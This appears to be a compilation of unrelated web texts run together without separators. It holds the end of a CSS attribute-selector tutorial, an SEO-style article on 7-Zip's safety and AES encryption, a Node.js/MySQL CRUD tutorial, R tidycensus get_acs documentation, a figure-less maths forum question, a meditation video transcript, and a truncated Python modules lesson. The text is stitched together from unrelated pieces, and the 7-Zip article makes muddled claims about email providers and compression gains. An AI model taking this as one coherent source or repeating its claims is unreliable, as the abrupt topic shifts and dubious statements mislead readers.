[id$=any] {
  background: #0b6;
}
</style>
<p class="text-test">Anything text</p>
<div class="test-section">attribute test</div>
<p class="testworld">text here any thing</p>
<p class="worldtest">text here any thing</p>
<p class="section_test">text here any thing</p>
<p class="sectiontestee">text here any thing</p>
<br>
<h4>Using with id any</h4>
<p id="sectiontesany">text here any thing</p>
<p id="anytest">text here any thing</p>

CSS [attribute^="value"] Example: with the ^ (caret) sign the selector matches attribute values that begin with the given value. Values that contain it only at the end or in the middle are not affected.
The code example below shows the caret selector:

<style>
[class^=test] {
  background: #0bf;
}
[id^=any] {
  background: #0b6;
}
</style>
<p class="text-test">Anything text</p>
<div class="test-section">attribute test</div>
<p class="testworld">text here any thing</p>
<p class="worldtest">text here any thing</p>
<p class="test_section">text here any thing</p>
<p class="sectiontestee">text here any thing</p>
<h4>Using with id any</h4>
<p id="sectiontesany">text here any thing</p>
<p id="anytest">text here any thing</p>
<p id="ssanytest">text here any thing</p>

CSS [attribute~="value"] Example: with the ~ (tilde) sign the selector matches only when the value appears as a complete, space-separated word in the attribute, not joined to other text or to symbols such as - or _. The code example below shows the tilde selector:

<style>
[class~=test] {
  background: #0bf;
}
[title~=test] {
  background: #0bf;
}
[id~=any] {
  background: #0b6;
}
</style>
<p class="test">Anything text</p>
<p class="testworld">text here any thing</p>
<p class="worldtest">text here any thing</p>
<p class="test_section">text here any thing</p>
<div class="test-section" title="test">attribute test</div>
<p class="sectiontestee">text here any thing</p>
<h4>Using with id any</h4>
<p id="sectiontesany">text here any thing</p>
<p id="any">text here any thing</p>
<p id="ssanytest">text here any thing</p>

CSS [attribute*="value"] Example: with the * (asterisk) sign the selector matches wherever the value occurs inside the attribute: at the start, in the middle or at the end, including when it is joined with symbols such as - or _.
You can see the example code below:

<style>
[class*=test] {
  background: #0bf;
}
[title*=test] {
  background: #0bf;
}
[id*=any] {
  background: #0b6;
}
</style>
<p class="test">Anything text</p>
<p class="testworld">text here any thing</p>
<p class="worldtest">text here any thing</p>
<p class="tes_section">text here any thing</p>
<div class="test-section" title="test">attribute test</div>
<p class="sectiontestee">text here any thing</p>
<h4>Using with id any</h4>
<p id="sectiontesany">text here any thing</p>
<p id="any">text here any thing</p>
<p id="anttt">here any thing</p>
<p id="ssanytest">text here any thing</p>
How Safe Is 7zip? Is 7-Zip a virus, and how can you remove it?

Is 7-Zip a secure program? This is a common question when a user encounters a lesser-known application for the first time. This article looks at whether 7-Zip is safe, what it is actually used for, and how trustworthy it is.

7Zip is a file-compression program. Many people are unfamiliar with the name and are unsure whether it is safe to use. 7Zip is safe, and its purpose is file compression: shrinking a file, or a set of files, to save disc space and organise congested data. It lets the end user take as many files as they wish and compress them into a single file or folder using a compression tool. Compared with the total size of the original files, this file or folder will be substantially smaller. When people talk about compression formats they almost always limit themselves to RAR and ZIP, so the question remains: is the 7-Zip file manager safe?

While 7-Zip may sound like a catchy moniker for a computer virus, it is a useful tool for compressing and decompressing files. If you share a computer for work, someone else might have installed 7-Zip without your knowledge. Leaving 7-Zip on your computer does no harm, but you can remove it quickly if you do not need it.

Must read: Is Steam Unlocked safe?

Concerns about the "7z virus"

The 7-Zip program will not harm your machine or steal your data. To protect your computer from real viruses, you should install an anti-virus program and keep it running at all times. 7-Zip itself is safe to download. Real viruses arrive in email messages, lurk in files you download, and can infect your machine when you visit unsafe websites. Windows Defender, which is built into Windows, also provides free protection against malicious software attacks.
7Zip provides the best compression results

While ZIP is the best-known file-compression format, it is not the best-performing one, and RAR formats are not much better. According to experts, the 7z format from 7Zip is the best compression format currently available, and it is safe. It even allows you to password-protect your archives, it is significantly more reliable, and it produces smaller files. Even though 7z outperforms ZIP in functionality, ZIP remains the most popular compression format on the market. That is no surprise: ZIP is the default compression tool in Microsoft Windows. The format is also usable on Mac and Linux. A common worry is whether it is safe to install 7-Zip when Windows reports an unknown publisher; as long as the installer comes from the official site, it is.

Most individuals are unaware that better file-compression alternatives exist. In fact, some people do not hear of 7Zip at all until it is pointed out to them.

Is 7Zip a safe and reliable program?

One significant advantage of 7Zip over similar programs such as WinRAR is that its .7z file extension is handled far more conservatively: no email provider can readily open it. With RAR or ZIP, the situation is different. And yes, 7Zip downloaded from 7-zip.org is safe.

Most email providers inspect RAR, ZIP and other common compression formats, and an archive containing executable files cannot be sent through email; users have to supply a separate .exe file in that situation. Because the 7z extension is less well known and less widely used, consumers are sometimes concerned about its integrity, security and safety. However, hundreds of thousands of people have already downloaded and installed 7Zip, and plenty of users on Reddit and other discussion sites will vouch for it.

On your Windows PC, the 7-Zip program may appear as 7z.exe. The 7z.exe process will not harm your machine.
When should you use 7-Zip?

One of the benefits of 7-Zip is that it is a free, open-source tool that can run on any machine. You do not need to register 7-Zip to use it, and thanks to its developer Igor Pavlov the tool integrates with the Windows shell: if you right-click a zip file, a menu option appears that lets you unzip the file with 7-Zip.

The tool uses the 7z file format, which compresses files more effectively than other compression utilities. When you upload and download such files, this can save you time on the Internet, lower your data costs, and free up space on your hard drive and other storage devices. So the answer to "is 7-Zip a safe download?" is yes.

One disadvantage of 7-Zip is that it is not as widely used as software supporting classic zip files, which most modern operating systems handle out of the box. If you send a 7z file to someone, you may need to explain what it is and how to open it, and even reassure them that it is not a virus or something else sinister.

Why should you trust 7Zip?

A lot of theories and questions float around about whether 7Zip is safe to use as an opener. 7Zip is entirely secure. It is clean and straightforward, and its UI distinguishes it from the competition: there is no need to brag or be ostentatious. It is plain and simple to understand, designed to list files and provide a small set of menus and handy toolbars. Other advantages include:

• No welcome dialogue windows.
• No sophisticated installation wizards.
• No pop-ups or advertisements.
• No unpleasant interruptions.
• A compression ratio improved by 25%.

Is there support for Linux-based operating systems?

Yes. And if you prefer something other than the primary user interface, press F9: 7-Zip turns into a file manager with two panes.

How to use 7Zip?
It is simple to use 7-Zip to compress, open, and split files, and you can easily verify files on your PC. The procedure for compressing files is straightforward, and the software can be driven both from the graphical user interface and from the command line. To extract files using the GUI, follow the steps below:

Step 1: Select the files you wish to extract.
Step 2: Right-click with your mouse. This opens a context menu.
Step 3: Hover your mouse over the "7-Zip" option.
Step 4: Select "Extract Here" from the drop-down menu. A new window displays the progress and the time remaining before the file is extracted.
Step 5: Wait for it to complete. The extracted file appears in the same folder as your other RAR or 7-Zip files.
Step 6: Alternatively, click the "Extract" button; a new 7-Zip window appears that prompts you to choose a location for your file to be saved.
Step 7: Wait for the application to finish the unzipping/unrar procedure, and you are done.

In terms of sheer performance and reliability, 7Zip outperforms competing archiving and file-compression software. If you do not mind the dated interface, 7Zip should be the first choice for everyone. File compression allows files to be transferred over the Internet more easily and rapidly, and 7Zip is safe: it compresses and encrypts files, allowing more data to be delivered more securely. 7Zip employs AES 256-bit encryption, which is an effective data-security approach. To appreciate how secure this is, you must first understand the AES standard and encryption key strength.

How can you do encryption with 7-Zip?

Encryption with AES

AES is an encryption approach that employs a sophisticated encryption procedure and practically unbreakable encryption keys, which goes a long way toward answering whether the 7z format is safe.
The AES encryption standard was created in response to the growing use of digital communications by the federal government and financial institutions, which called for a robust encryption system to secure state secrets, medical records, and financial data.

7Zip encryption and archiving

7Zip is a file archiving and encryption program, which says a lot about how safe it is. 7Zip compresses data into a small file that can be archived: you can take a group of files, compress them into smaller sizes, and put them in a single file for transport. You can encrypt the file, and only someone with the correct encryption key can open it.

Encryption with 256-bit AES

The AES specification defines 128-, 192-, and 256-bit encryption levels, which would take billions of years to crack using brute-force attacks. This is a robust encryption standard used for government communications, and because the standard is open for anyone to implement, AES gives excellent protection to anyone who employs it as a security measure, not just the government.

7Zip AES encryption strength

7Zip employs AES 256-bit encryption, the strongest form of AES. This means that without the encryption key a file is considered impenetrable, and guessing the key by brute force is infeasible unless a specific technique for cracking AES keys is discovered. Note, however, that 256-bit encryption is computationally expensive and takes time and energy to perform, so encrypting and decrypting large files or messages, especially over the Internet, may take some time.

How to remove 7-Zip from your computer

To uninstall 7-Zip, press the "Windows" key to bring up the Start screen, then right-click the 7-Zip icon and select "Uninstall" to open the Programs and Features window.
This window shows all of your installed apps, with 7-Zip, the app you right-clicked, highlighted. Windows removes 7-Zip from your machine when you click the "Uninstall/Change" button in the dialogue. Make sure 7-Zip is highlighted before hitting that button; you do not want to uninstall the wrong program. You do not need to restart your computer after uninstalling 7-Zip.

Different types of compression tools

Since most software you download comes in zip format, you will be more productive with a zip program. People may also email you compressed files containing documents, photos, and even enormous databases. WinZip and JZip are two such apps that can compress and decompress files. You can also use Windows File Explorer to extract everything from a zipped folder: select a compressed folder, then go to "Compressed Folder Tools" and "Extract All". To create an archive, select the file you want to zip in Windows File Explorer and then click "Zip". The conventional zip format is also supported by other operating systems, such as Apple macOS and many Linux variants.

How to open a zip file without WinZip

Many users rely on WinZip to open compressed zip files on Microsoft Windows and even on Mac computers. However, most modern systems have built-in operating-system capabilities that can open zip files without that application. Third-party zip programs still have some advantages for some people, such as cloud-storage integration and support for additional compression formats. You can open a zip file on a Windows or Mac computer without any additional software simply by double-clicking it.

Use Windows to open zip files

Zip files are widely used to compress one or more files so they can be stored more compactly or sent over the Internet more quickly. They are frequently offered when downloading photographs or software from various websites, and they are also often distributed as email attachments.
Because the zip file system and format are openly defined, a wide range of tools can read and write zip files. Note that zip files can contain malware, so if you receive one unexpectedly, such as in an email, be cautious until you confirm its safety by contacting the sender.

If you acquire a zip file, or come across one on your computer in any other way, you can quickly open it with Windows' built-in capabilities. You can either extract all of the files in the zipped folder by right-clicking it and selecting "Extract All", or double-click it and drag any files inside to your desktop or another chosen location. On Windows, you can also create a zip file by right-clicking a file or folder and selecting "Compressed (zipped) folder" from the "Send to" menu.

How to open zip files on a Mac

On a Mac you can also double-click a zip file to open it without any extra software. A zip file read or created on Windows, macOS, or another operating system will behave the same way everywhere, and the encryption 7Zip applies is just as safe across platforms.

Zip utilities from third parties

If you prefer, you can get several third-party compression applications, free or paid, including WinZip, 7-Zip, and WinRAR. Many of them handle additional file formats, such as WinRAR's RAR format or 7-Zip's .7z format, and many offer alternative interfaces that can be helpful if you interact with zip files frequently or need to create particularly complex archives.

Use of cloud services

Many zip utilities also integrate with cloud services such as Dropbox and OneDrive, allowing users to upload compressed files effortlessly. Some even offer additional features, such as splitting large archives into smaller chunks to fit specific types of recordable media like CDs or small USB memory sticks.

FAQ

How safe is 7zip?
The 7-Zip program will not harm your machine or steal your data. To protect your computer from real viruses, you should install an anti-virus program and keep it running at all times. Real viruses can arrive in email messages, lurk in files you download, and infect your machine when you visit unsafe websites.

How safe is 7zip encryption?

7Zip employs AES 256-bit encryption, the strongest form of AES. This means that a file is deemed impenetrable without the encryption key, and guessing the key by brute force is infeasible unless a specific technique for cracking AES keys is discovered.
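To get a feel for why a 256-bit key is considered impenetrable, here is a rough back-of-the-envelope calculation. The guessing rate is an illustrative assumption, not a measured figure:

```python
# Rough illustration of the AES-256 keyspace.
keyspace = 2 ** 256                    # number of possible 256-bit keys
guesses_per_second = 10 ** 12          # assume a trillion guesses per second
seconds_per_year = 60 * 60 * 24 * 365

# Expected brute-force time: on average, half the keyspace must be searched.
years = keyspace / 2 / guesses_per_second / seconds_per_year
print(f"about {years:.1e} years")      # on the order of 10^57 years
```

Even with these wildly optimistic hardware assumptions, the search time dwarfs the age of the universe, which is the basis of the "billions of years" figure quoted above.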
Node JS MySQL Crud operations

Simple CRUD operations with Node.js and MySQL

To perform CRUD operations with Node.js and MySQL, we'll create a post management system. In this post management system, a user can create posts, read posts, update posts and delete posts. So let's build it.

Step – 1

First, you need to install Node.js on your system. After that, create a new folder on your desktop and name it whatever you want; here I named it nodemysql. Then initialize NPM inside the newly created folder.

How to initialize NPM? Open your terminal, change into the folder where you want to initialize NPM, and run the npm init command.

Step – 2

After completing step one, install the four dependencies –

• express – npm install express --save
• mysql2 – npm install mysql2 --save
• body-parser – npm install body-parser --save
• twig template engine – npm install twig --save

My package.json File

{
  "name": "nodemysql",
  "version": "1.0.0",
  "description": "",
  "main": "app.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "Webtutorials.ME",
  "license": "MIT",
  "dependencies": {
    "body-parser": "^1.18.3",
    "express": "^4.16.4",
    "mysql2": "^1.6.4",
    "twig": "^1.12.0"
  }
}

Step – 3

Now it is time to configure our database. Open your MySQL or MariaDB server (you can also use XAMPP or WAMP) and create a new database called node_mysql. Use the SQL query below to create the posts table and its structure in the node_mysql database.
CREATE TABLE `posts` (
  `id` int(11) NOT NULL,
  `title` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL,
  `content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `author` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `created_at` date NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

ALTER TABLE `posts` ADD PRIMARY KEY (`id`);
ALTER TABLE `posts` MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

Posts table structure

Step – 4

After completing the database configuration, we'll create our files. Before creating them, let's take a look at the nodemysql folder structure.

Node.js MySQL folder structure

Creating files

First, we'll create the database.js file inside the config folder to make the connection with our database.

database.js

const mysql = require('mysql2');

const connection = mysql.createConnection({
    host     : 'localhost', // MYSQL HOST NAME
    user     : 'root',      // MYSQL USERNAME
    password : '',          // MYSQL PASSWORD
    database : 'node_mysql' // MYSQL DB NAME
});

module.exports = connection;

After that, we'll create the app.js file. It is named app.js because the package.json file says "main": "app.js".
app.js

const express = require('express');
const app = express();
const twig = require('twig');
const bodyParser = require('body-parser');

// IMPORT DB CONNECTION
const connection = require('./config/database');

// SET VIEW ENGINE
app.set('view engine', 'html');
app.engine('html', twig.__express);
app.set('views', 'views');

// USE BODY-PARSER MIDDLEWARE
app.use(bodyParser.urlencoded({ extended: false }));

app.get('/', (req, res) => {
    // FETCH ALL THE POSTS FROM DATABASE
    connection.query('SELECT * FROM `posts`', (err, results) => {
        if (err) throw err;
        // RENDERING INDEX.HTML FILE WITH ALL POSTS
        res.render('index', {
            posts: results
        });
    });
});

// INSERTING POST
app.post('/', (req, res) => {
    const title = req.body.title;
    const content = req.body.content;
    const author_name = req.body.author_name;

    const post = {
        title: title,
        content: content,
        author: author_name,
        created_at: new Date()
    }

    connection.query('INSERT INTO `posts` SET ?', post, (err) => {
        if (err) throw err;
        console.log('Data inserted');
        return res.redirect('/');
    });
});

// EDIT PAGE
app.get('/edit/:id', (req, res) => {
    const edit_postId = req.params.id;
    // FIND POST BY ID
    connection.query('SELECT * FROM `posts` WHERE id=?', [edit_postId], (err, results) => {
        if (err) throw err;
        res.render('edit', {
            post: results[0]
        });
    });
});

// POST UPDATING
app.post('/edit/:id', (req, res) => {
    const update_title = req.body.title;
    const update_content = req.body.content;
    const update_author_name = req.body.author_name;
    const userId = req.params.id;

    connection.query('UPDATE `posts` SET title = ?, content = ?, author = ?
WHERE id = ?', [update_title, update_content, update_author_name, userId], (err, results) => {
        if (err) throw err;
        if (results.changedRows === 1) {
            console.log('Post Updated');
            return res.redirect('/');
        }
    });
});

// POST DELETING
app.get('/delete/:id', (req, res) => {
    connection.query('DELETE FROM `posts` WHERE id = ?', [req.params.id], (err, results) => {
        if (err) throw err;
        res.redirect('/');
    });
});

// SET 404 PAGE
app.use('/', (req, res) => {
    res.status(404).send('<h1>404 Page Not Found!</h1>');
});

// IF DATABASE CONNECTION IS SUCCESSFUL
connection.connect((err) => {
    if (err) throw err;
    app.listen(3000);
});

In app.js you can see that we are not validating the form data. If you would like me to make a tutorial on how to validate form data with Node.js, just drop me a comment.

Creating views

Now we'll create our views inside the views folder –

index.html

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>CRUD with Node.JS + MySQL</title>
  <!-- USING BOOTSTRAP FOR STYLING USER INTERFACE -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css" integrity="sha384-GJzZqFGwb1QTTN6wy59ffF1BuGJpLSa9DkKMp0DgiMDm4iYMj70gZWKYbI706tWS" crossorigin="anonymous">
  <style>
    .customRow{
      background-color: #f2f2f2;
      padding: 20px;
    }
  </style>
</head>
<body>
  <div class="customRow">
    <div class="container">
      <div class="card">
        <div class="card-body">
          <h1 class="text-center">Post Management System</h1>
          <hr>
          <form action="" method="POST">
            <div class="form-group">
              <label for="post_title">Post Title</label>
              <input type="text" name="title" class="form-control" placeholder="Title" id="post_title" required>
              <label for="post_content">Post Content</label>
              <textarea name="content" class="form-control" placeholder="Write something" id="post_content" required></textarea>
              <label for="author_name">Author Name</label>
              <input type="text" name="author_name" class="form-control" placeholder="Enter author name" id="author_name" required>
              <br>
              <input type="submit" value="POST" class="btn btn-primary">
            </div>
          </form>
          <hr>
          <h2 class="text-center">All Posts</h2>
          <!-- IF HAVE ANY POSTS -->
          {% if posts|length > 0 %}
            <!-- LOOPING ALL THE POSTS -->
            {% for post in posts %}
              <div class="card">
                <div class="card-body">
                  <h5 class="card-title">{{ post.title | e }} | <small><span>{{ post.created_at | date("d M, Y") }}</span></small></h5>
                  <p class="card-text text-justify">{{ post.content | e }}</p>
                  <span class="float-right"><strong>By</strong>, {{ post.author | e }}</span>
                  <a href="/edit/{{ post.id | e }}" class="btn btn-light">✎ Edit</a>
                  <a href="/delete/{{ post.id | e }}" class="btn btn-danger">Delete</a>
                </div>
              </div>
              <hr>
            {% endfor %}
          {% else %}
            <h4>No Post Found !</h4>
          {% endif %}
        </div>
      </div>
    </div>
  </div>
  <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js" integrity="sha384-wHAiFfRlMFy6i5SRaxvfOCifBUQy1xHdJ/yoi7FRNXMRBu5WHdZYu1hA6ZOblgut" crossorigin="anonymous"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js" integrity="sha384-B0UglyR+jN6CkvvICOB2joaf5I4l3gm9GU6Hc1og6Ls7i6U/mkkaduKaBhlAXv9k" crossorigin="anonymous"></script>
</body>
</html>

edit.html

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Edit Post</title>
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css" integrity="sha384-GJzZqFGwb1QTTN6wy59ffF1BuGJpLSa9DkKMp0DgiMDm4iYMj70gZWKYbI706tWS" crossorigin="anonymous">
  <style>
    .customRow{
      background-color: #f2f2f2;
      padding: 20px;
    }
  </style>
</head>
<body>
  <div class="customRow">
    <div class="container">
      <div class="card">
        <div class="card-body">
          <h1 class="text-center">Post Management System</h1>
          <hr>
          {% if post is empty %}
            <h3>Invalid Post ID</h3>
          {% else %}
            <form action="" method="POST">
              <div class="form-group">
                <label for="post_title">Title</label>
                <input type="text" name="title" class="form-control" placeholder="Title" id="post_title" value="{{ post.title | e }}" required>
                <label for="post_content">Post Content</label>
                <textarea style="height:100px;" name="content" class="form-control" placeholder="Write something" id="post_content" required>{{ post.content | e }}</textarea>
                <label for="author_name">Author Name</label>
                <input type="text" name="author_name" class="form-control" placeholder="Enter author name" id="author_name" value="{{ post.author | e }}" required>
                <br>
                <input type="submit" value="UPDATE" class="btn btn-success">
              </div>
            </form>
          {% endif %}
        </div>
      </div>
    </div>
  </div>
  <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js" integrity="sha384-wHAiFfRlMFy6i5SRaxvfOCifBUQy1xHdJ/yoi7FRNXMRBu5WHdZYu1hA6ZOblgut" crossorigin="anonymous"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js" integrity="sha384-B0UglyR+jN6CkvvICOB2joaf5I4l3gm9GU6Hc1og6Ls7i6U/mkkaduKaBhlAXv9k" crossorigin="anonymous"></script>
</body>
</html>

Completed. Download this project from GitHub

Learn also: CRUD with Node JS and MongoDB, CRUD with Node JS and Mongoose
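As the tutorial notes, the route handlers trust req.body as-is. A minimal server-side validation helper could look like the sketch below; validatePost is a hypothetical function, not part of the tutorial code, and the length limits simply mirror the posts table schema (title VARCHAR(60), author VARCHAR(20)):

```javascript
// Hypothetical helper: collects validation errors for the post form fields.
// Length limits mirror the `posts` table: title VARCHAR(60), author VARCHAR(20).
function validatePost(body) {
    const errors = [];
    const title = (body.title || '').trim();
    const content = (body.content || '').trim();
    const author = (body.author_name || '').trim();

    if (title.length === 0 || title.length > 60) {
        errors.push('Title is required and must be at most 60 characters.');
    }
    if (content.length === 0) {
        errors.push('Content is required.');
    }
    if (author.length === 0 || author.length > 20) {
        errors.push('Author name is required and must be at most 20 characters.');
    }
    return errors;
}

module.exports = validatePost;
```

In the app.post('/') handler you could then call validatePost(req.body) first and re-render the form with the error messages whenever the returned array is non-empty.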
get_acs: Obtain data and feature geometry for the American Community Survey

Usage

get_acs(
  geography,
  variables = NULL,
  table = NULL,
  cache_table = FALSE,
  year = 2022,
  output = "tidy",
  state = NULL,
  county = NULL,
  zcta = NULL,
  geometry = FALSE,
  keep_geo_vars = FALSE,
  shift_geo = FALSE,
  summary_var = NULL,
  key = NULL,
  moe_level = 90,
  survey = "acs5",
  show_call = FALSE,
  ...
)

Arguments

geography — The geography of your data.

variables — Character string or vector of character strings of variable IDs. tidycensus automatically returns the estimate and the margin of error associated with the variable.

table — The ACS table for which you would like to request all variables. Uses lookup tables to identify the variables; performs faster when the variable table already exists through load_variables(cache = TRUE). Only one table may be requested per call.

cache_table — Whether or not to cache table names for faster future access. Defaults to FALSE; if TRUE, only needs to be called once per dataset. If the variables dataset is already cached via the load_variables function, this can be bypassed.

year — The year, or endyear, of the ACS sample. 5-year ACS data is available from 2009 through 2022; 1-year ACS data is available from 2005 through 2022, with the exception of 2020. Defaults to 2022.

output — One of "tidy" (the default), in which each row represents an enumeration unit-variable combination, or "wide", in which each row represents an enumeration unit and the variables are in the columns.

state — An optional vector of states for which you are requesting data. State names, postal codes, and FIPS codes are accepted. Defaults to NULL.

county — The county for which you are requesting data. County names and FIPS codes are accepted. Must be combined with a value supplied to `state`. Defaults to NULL.

zcta — The zip code tabulation area(s) for which you are requesting data. Specify a single value or a vector of values to get data for more than one ZCTA. Numeric or character ZCTA GEOIDs are accepted. When specifying ZCTAs, geography must be set to `"zcta"` and `state` must be specified with `county` left as `NULL`. Defaults to NULL.

geometry — If FALSE (the default), return a regular tibble of ACS data. If TRUE, uses the tigris package to return an sf tibble with simple feature geometry in the `geometry` column.

keep_geo_vars — If TRUE, keeps all the variables from the Census shapefile obtained by tigris. Defaults to FALSE.

shift_geo — (Deprecated) If TRUE, returns geometry with Alaska and Hawaii shifted for thematic mapping of the entire US. Geometry was originally obtained from the albersusa R package. As of May 2021, we recommend using tigris::shift_geometry() instead.

summary_var — Character string of a "summary variable" from the ACS to be included in your output. Usually a variable (e.g. total population) that you'll want to use as a denominator or comparison.

key — Your Census API key. Obtain one at https://api.census.gov/data/key_signup.html

moe_level — The confidence level of the returned margin of error. One of 90 (the default), 95, or 99.

survey — The ACS contains one-year, three-year, and five-year surveys expressed as "acs1", "acs3", and "acs5". The default selection is "acs5".

show_call — If TRUE, display the call made to the Census API. This can be very useful in debugging and determining whether error messages returned are due to tidycensus or the Census API. Copy the API call into a browser and see what is returned by the API directly. Defaults to FALSE.

... — Other keyword arguments.

Value

A tibble or sf tibble of ACS data.

Examples

if (FALSE) {
library(tidycensus)
library(tidyverse)
library(viridis)
census_api_key("YOUR KEY GOES HERE")

tarr <- get_acs(geography = "tract", variables = "B19013_001",
                state = "TX", county = "Tarrant", geometry = TRUE, year = 2020)

ggplot(tarr, aes(fill = estimate, color = estimate)) +
  geom_sf() +
  coord_sf(crs = 26914) +
  scale_fill_viridis(option = "magma") +
  scale_color_viridis(option = "magma")

vt <- get_acs(geography = "county", variables = "B19013_001",
              state = "VT", year = 2019)

vt %>%
  mutate(NAME = gsub(" County, Vermont", "", NAME)) %>%
  ggplot(aes(x = estimate, y = reorder(NAME, estimate))) +
  geom_errorbar(aes(xmin = estimate - moe, xmax = estimate + moe),
                width = 0.3, size = 0.5) +
  geom_point(color = "red", size = 3) +
  labs(title = "Household income by county in Vermont",
       subtitle = "2015-2019 American Community Survey",
       y = "",
       x = "ACS estimate (bars represent margin of error)")
}
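The moe_level argument works by rescaling the published margin of error with a different z-score. As an illustration of that arithmetic (this is not tidycensus code; the function name is hypothetical, and the z-values are the standard normal critical values commonly used with ACS margins of error), a small sketch in Python:

```python
# Standard normal critical values for the three supported confidence levels.
# The ACS publishes margins of error at the 90% level by default.
Z = {90: 1.645, 95: 1.960, 99: 2.576}

def convert_moe(moe: float, from_level: int, to_level: int) -> float:
    """Rescale a margin of error from one confidence level to another."""
    return moe * Z[to_level] / Z[from_level]

# A 90% margin of error of 5000 becomes roughly 5957 at the 95% level.
print(round(convert_moe(5000, 90, 95)))  # 5957
```

This mirrors what changing moe_level from 90 to 95 or 99 does to the moe column in the returned tibble.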
User Forum
Subject: IMO    Class: Class 5

Find the total shaded area of the figure made up of identical squares.
A. 38 cm²
B. 243 cm²
C. 171 cm²
D. 196 cm²

Answer (Master Answer, Class 1): The correct answer is C.
Affirmative Self-Programming Meditation

J. Michael Murphy here, and today is Thursday, November 1st, 2018. In this video I will be discussing and introducing affirmative self-programming meditation.

The purpose of affirmative self-programming meditation in metaphysics and mysticism is to reprogram the mind for success and prosperity, both internally and externally. Negative thought patterns and beliefs are nullified and replaced with positive thoughts. Affirmative self-programming is designed to target the subconscious mind, which is involved in over 90% of our conscious decision-making. Our will and our intentions, our word or logos so to speak, are programmed into the subconscious mind through the repetition of mystically structured affirmations. Mystical meditation can then be performed to quiet the surface conscious mind, making it more receptive to any divine guidance, knowledge, and/or energy being sent through the subconscious from the higher mind.

As mentioned, affirmations should be mystically worded to have the desired effect. This means they should state that what you desire is already so, already exists as reality. Thanks should also be given, further reaffirming that the desire already exists as a reality, whether thanks to God, the Higher Self, the universe, etc. Affirmations should be repeated daily while in a deep state of mystical meditation, when there is open communication between the surface conscious layer of the mind (our carnal mind) and the subconscious and the deeper levels of the divine. Affirmations may also be written down and carried on your person, in your pocket or in your bag, and these can be taken out and read aloud during the day for increased effect. I should mention that affirmations may also be spoken aloud during the meditation. Visualization is also utilized, both in light meditative states and deep mystical meditative states. Visualize yourself as existing and living your life having the things or qualities that you desire.

Affirmative self-programming meditation works because it is based in practical mysticism and mystical power. Mystical power is having the knowledge that a higher source (the cosmic mind, the higher mind, the true self, whatever you want to call it) exists within each mind, and that locating and tapping into that power leads to limitless possibilities for reality. Mystics truly do believe this, and that is the motivation behind their never-ending quest for communion with God. Jesus himself said that the miracles he performed, even the divine wisdom he spoke, were not his own but actually those of the Father that dwells in him. Jesus also said that all the things he did, we can do too, and better. So Jesus told us that if we have faith when we pray, we will be given whatever we ask for. So do you believe? It's hard to have faith, whether it's a Christian or religious-based faith, or whether, even as an atheist, you are following this kind of metaphysical path and want to have faith in the ultimate power of your mind. Maybe you believe that the mind is capable of doing miraculous things, but…

Python Programming 19: Modules

Okay guys, in this video I'm gonna talk to you about modules. Sometimes you're gonna have functions that you're gonna want to use over and over and over again, maybe not only in the same program but maybe in different programs. So instead of having to rewrite the function every single time, what you can do is throw all the functions that you're gonna use over and over again in a separate file, and then just pull that file into whatever program you're working on. So not only does it keep you from writing a bunch of code, but it also helps organize your programming a little bit better, and I'm gonna
show you guys how to make those right now. So again, like I said, right now we're gonna make a module, which is just a function included in another file. So we're gonna need another file: right-click on your project and choose New > Python File. I'll just name this something, I don't know, like tuna. So, tuna.py; .py is the extension for a Python file. Then hit OK. So now our project has two files in the same directory: this main, which is our main program, the one we've been working on, and this tuna, which is the one we just made. (And we can just delete that; that doesn't really matter.) So in this tuna file I'm just gonna make a really simple function right now. So, def, and I'll just call it... you can call it anything you want, I'm just gonna name it fish, because, I don't know, why the heck not. All right, so this function just kind of prints a line on screen. I'll just say "I am a tuna fish". There we go. All right, so say that we wanted to use this function over and over and over again. We just wrote it once, we threw it in a module, and we're good to go. So now, whenever we actually want to use it, go back to your main program. In order to use any of the stuff in your module, you first need to say, okay, we want to include another file. So how do we do that? Well, you actually type the word import, and that means go get a file from somewhere else and use it in this program. So then it says, okay, well, what's the name of your file? Well, it's just called tuna, and you don't write .py, because whenever you import a module it knows that of course it's another Python file. So again, no need to include that .py. Don't do it; it knows. So right now, in this program we're working on, basically what's going on behind the scenes is it goes to this file, copies it, and pastes it right in here, even though, you know, you don't see it. That's kind of a good example. So if you just run this right
now, check it out: nothing happens. Why is that? Well, we included this, but we didn't say to actually use this function right here. So in order to use functions that are inside modules, we just can't write fish like this, even though this function is named fish right here. Check it out: if we run it, it says, okay, fish is not defined. So why can't we do that? Well, the reason for that is, say we were including a bunch of modules, maybe some modules that we wrote, maybe some that our friends wrote, maybe some that some random people on the internet wrote. Well, maybe each of those modules has a function…

10 Simple CSS Code Examples You Can Learn in 10 Minutes

